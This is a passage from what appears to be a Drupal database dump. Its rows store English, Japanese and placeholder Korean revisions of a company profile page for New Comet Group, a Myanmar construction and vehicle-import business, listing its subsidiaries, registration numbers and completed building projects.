('page', 0, 27, 241, 'ja', 0, '<p>&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p>', '', 'full_html'),
('page', 0, 27, 241, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 27, 242, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Nay-Pyi-Taw Staff Housing Project<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Yandanar Pone College in Mandalay<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fire Station in Myawaddy Division<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Basic Education Middle, High Schools in various towns. (32 in total)<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Fair-priced Housing Projects<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Private Housing<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Projects in Health Industry&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two storied Building (Technical School At Bo-Ka-Lay)<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Two Storied RCC Building (MaUPin)</li></ul><blockquote><p>4. <strong>Zeya New Comet Auto Sale &amp; Services Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoListParagraphCxSpFirst\">Our Auto Trade Company was built from 1987 by buying permit of crew permit and importation and brother company New Comet Company Ltd. At 1990 established and private car, saloon car, truck car, bus car and spare-part importation from Japan. Besides Zeya New Comet Company we cooperate with other NEW ZAYYA SHWEPYI Company, AUNG NAY WIN Company, Tai Myint Aung Company made importation of private car, truck, Bus and spare-part from Japan for (25) years with the employment of 100 workers and purchase of import permit from Ministry of Commerce.&nbsp;<o:p></o:p></p><p class=\"MsoListParagraphCxSpLast\">Our ZEYA NEW COMET Auto Services Company appointed expert staff and import Japan Car for smooth operation for customer satisfaction.&nbsp;</p><hr><p class=\"MsoListParagraphCxSpLast\"><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 27, 242, 'ja', 0, '<p>&nbsp;&nbsp;&nbsp;<img data-entity-uuid=\"1153a72f-a283-46f1-a351-b0da59976c09\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc_0.jpg\" width=\"100%\">&nbsp;「ニュー コメット グループ企業」は 1996 年に設立され、以下の支店で組織されています。<br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」<br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」<br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」<br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」<br>5.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット トレーディング エージェンシー 株式会社」</p><blockquote><h5><br>1.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー コメット コンストラクション株式会社」</h5></blockquote><p><br>当社の「ニュー コメット コンストラクション株式会社」は2004年に会社登録番号(295/2004-2005)で事業を開始し、ヤンゴン地方域、エーヤーワディ地方域、ザガイン地方域、マンダレー地方域 とネピドー連合領土を拠点に自動車販売と建設機械の輸入、建設業を営んでおります。<br>当社「ニュー コメット コンストラクション株式会社」の2013-2014年と2014-2015年の竣工工事の一部は以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;国籍青少年資源開発大学(ザガイン)<br>-&nbsp;&nbsp;&nbsp;&nbsp;ザガイン大学 (教育と学習のための2階建ての建物)<br>-&nbsp;&nbsp;&nbsp;&nbsp;道路交通総局と「チェタゴンティッ建設会社」の住宅プロジェクト協力<br>&nbsp; &nbsp; &nbsp;上記の活動に加えて、</p><p>-&nbsp;&nbsp;&nbsp;&nbsp;政府機関および民間の建物の修繕工事<br>-&nbsp;&nbsp;&nbsp;&nbsp;エーヤーワディ地方域で元従業員向けに手頃な価格の住宅を建設<br>-&nbsp;&nbsp;&nbsp;&nbsp;建築設計図<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は、専門コンサルタント、専門作業員、管理責任者、工事監督者、その<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;他国内外の労働者とともに、基準に沿って最新化された資機材により、<br>&nbsp; &nbsp; &nbsp;建物、道路、橋梁の建設工事を行っております。<br>-&nbsp;&nbsp;&nbsp;&nbsp;当社は理念建築、病院、学校の設計図作成、強度計算などの慈善事業を可能<br>&nbsp;&nbsp;&nbsp;&nbsp;な限り手掛けさせていただきました。</p><blockquote><h5><br>2.&nbsp;&nbsp;&nbsp;&nbsp;「ニュー ゼヤーシュエ ピィーコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「ニュー ゼヤー シュエ ピィーコンストラクション株式会社」は 2000 年 5 月 30 日に設立され、会社登録番号は(191/2001-2002)です。当社は信頼できる企業の一つであり、教育、医療、産業建築、個人住宅を提供しており、政府および民間部門の両方で多くのプロジェクトが実施されています。会社の存続期間を通じて、複雑な建設プロジェクトにおける当社の細部へのこだわりと専門知識。 当社はコスト削減ソリューションを提供する能力でクライアントから多くの賞賛を受けています。教育、医療、工業用住宅など、多くのプロジェクトを建設してきました。<br>私たちは、<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設前サービス<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;土建屋<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;デザインビルダー<br>&nbsp;&nbsp;&nbsp;&nbsp;-&nbsp;&nbsp;&nbsp;&nbsp;建設部長を提供させていただきました。</p><blockquote><h5><br>3.&nbsp;&nbsp;&nbsp;&nbsp;「アウン ネイ ワォンコンストラクション株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の「アウン ネイ ワォンコンストラクション株式会社」は 2005年に設立され、会社登録番号は(265/2005-2006)です。同社は、民間および政府部門で住宅建築、商業建築、インテリアデザインのプロジェクトに従事しています。私たちのプロジェクトは以下の通りです。<br>-&nbsp;&nbsp;&nbsp;&nbsp;ネピドー職員住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;マンダレー ヤダナポン大学<br>-&nbsp;&nbsp;&nbsp;&nbsp;ミャワディ地域消防署<br>-&nbsp;&nbsp;&nbsp;&nbsp;さまざまな郡区の基礎教育中/高等学校。 (計32都市)<br>-&nbsp;&nbsp;&nbsp;&nbsp;手頃な価格の住宅プロジェクト<br>-&nbsp;&nbsp;&nbsp;&nbsp;民間住宅<br>-&nbsp;&nbsp;&nbsp;&nbsp;2階建ての建物 (ボガレ工科大学)<br>-&nbsp;&nbsp;&nbsp;&nbsp;RCC 2階建ての建物(マウビン)</p><blockquote><h5><br>4.&nbsp;&nbsp;&nbsp;&nbsp;「ゼヤー ニュー コメット オートセールスとサービス株式会社」</h5></blockquote><p><br>&nbsp;&nbsp;&nbsp;&nbsp;当社の自動車商社は1987年に外国人船員の名義で輸入許可証の売買を行う個人事業として設立されました。「ニュー コメット」株式会社は1990年に設立され、「ゼヤー ニュー コメット オートセールスとサービス株式会社」の子会社です。 「家庭用自動車」「各種サルーン自動車」「各種商用トラック」「観光・輸送用各種バス」「各種機械」を日本より直接仕入れ、輸入販売を開始いたしました。<br>当社「ゼヤー ニュー コメット オートセールスとサービス株式会社」には、業務を促進する資格のある従業員がいます。 お客様に十分にご満足いただけるよう、良い車を日本から直輸入しております。</p>', '', 'full_html'),
('page', 0, 27, 242, 'ko', 0, '<p>Coming soon...</p>', '', 'full_html'),
('page', 0, 27, 243, 'en', 0, '<p><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\"><img data-entity-uuid=\"ab23ef9a-b19e-44cb-859b-9e243b2192c9\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/0-02-06-707e64535820a2e01c60182bae8fafed776a80b5294ffbbf63dd3a3bb680ab39_87337caf547d9cc.jpg\" width=\"100%\">New Comet Group of Co.,Ltd was founded in 1996 and started operation with Branches Companies as Follow:</span></p><ol><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;New Zayya Shwe Pyi Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Aung Nay Wun Construction Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-size:12.0pt;line-height:107%;\">&nbsp; &nbsp; &nbsp; &nbsp;Zeya New Comet Auto Sale &amp; Services Co.,Ltd</span><o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;New Comet Trading Agency Co.,Ltd</span></li></ol><hr><blockquote><ol><li class=\"MsoListParagraph\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><strong>&nbsp; &nbsp; &nbsp; &nbsp;New Comet Construction Co.Ltd</strong></li></ol></blockquote><p class=\"MsoNormal\">New comet construction Co.Ltd was founded in 2004 with company Licence ( 295/ 2004-2005) and started operation construction projects , Import and sale of construction and industrial machinery and vehicles based in Yangon, Mandalay, Ayawaddy, Nay Pyi Taw, Sagaing States etc.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Some of the construction works completed by us in the financial year (2013-2014) and (2014-2015) by our ``New Comet Construction\'\' Co.,Ltd are:&nbsp;<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">Nationalities Youth Resource Development Degree College ( Sagaing)</span><o:p></o:p></p><p class=\"MsoNormal\">• Sagaing University (two storyed classroom)<o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">• <span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;\">A joint venture housing project between Road Transport Administration Department and NEW COMET Construction Co.Ltd</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">In addition to the above projects :&nbsp;</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Departmental and private building construction and repair works</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of affordable housing for ex-employees in cities in Irrawaddy Region</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Architectural design modeling</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Construction of buildings and roads and bridges continues to be carried out according to standards with veteran consultants, professional engineers, management office staff, project supervisors from the region and other regions, skilled workers and modern equipment</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-no-proof:yes;\">• Our company has been doing charity work for as long as it is capable of designing and calculating the strength of related religious buildings, hospitals and schools.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">2. <strong>New Zayya Shwe Pyi Construction Co.,Ltd</strong><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"mso-spacerun:yes;\">&nbsp;</span>New Zayya Shwe Pyi Construction Co.,Ltd was founded in May 30<sup>th</sup>, 2001 with Company Registration Number (191/ 2001-2002). We standed as one of the trustful companies and completed projects in educational, health care, industrial buildings, private housing, high rise condominium in both public and private sectors.&nbsp;<o:p></o:p></p><p class=\"MsoNormal\">Throughout our existence, we had been praised by our clients for our attention to detail and our ability to provide knowledge driven and cost saving solutions for the complex construction projects. We built projects in areas such as Education, Health Care, Industrial Housing.<o:p></o:p></p><p class=\"MsoNormal\">Our Services are:<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Pre Construction-Service&nbsp;<o:p></o:p></li><li class=\"MsoListParagraphCxSpMiddle\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;General Contractor<o:p></o:p></li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; &nbsp;Design Builder</li><li class=\"MsoListParagraphCxSpLast\" style=\"mso-list:l0 level1 lfo1;text-indent:-.25in;\"><span style=\"font-family:&quot;Calibri&quot;,sans-serif;font-size:11.0pt;line-height:107%;mso-ansi-language:EN-US;mso-ascii-theme-font:minor-latin;mso-bidi-font-family:&quot;Myanmar Text&quot;;mso-bidi-language:MY;mso-bidi-theme-font:minor-bidi;mso-fareast-font-family:Calibri;mso-fareast-language:EN-US;mso-fareast-theme-font:minor-latin;mso-hansi-theme-font:minor-latin;\">&nbsp; &nbsp; &nbsp; Construction Manager</span></li></ul><blockquote><p>3. <strong>Aung Nay Wun Construction Co., Ltd</strong></p></blockquote><p class=\"MsoNormal\" style=\"margin-left:.5in;\">Aung Nay Wun Construction Co.,Ltd was founded in 2005 with company registration Number (265/ 2005-2006) emphasizing in residential, commercial, construction and interior design in private and government sectors. Some of the projects we have constructed are as follow:&nbsp;<o:p></o:p></p><ul style=\"list-style-type:disc;\"><li class=\"MsoListParagraphCxSpFirst\" style=\"margin-left:1.0in;mso-add-space:auto;mso-list:l0 level1 lfo1;text-indent:-.25in;\">&nbsp; &nbsp; 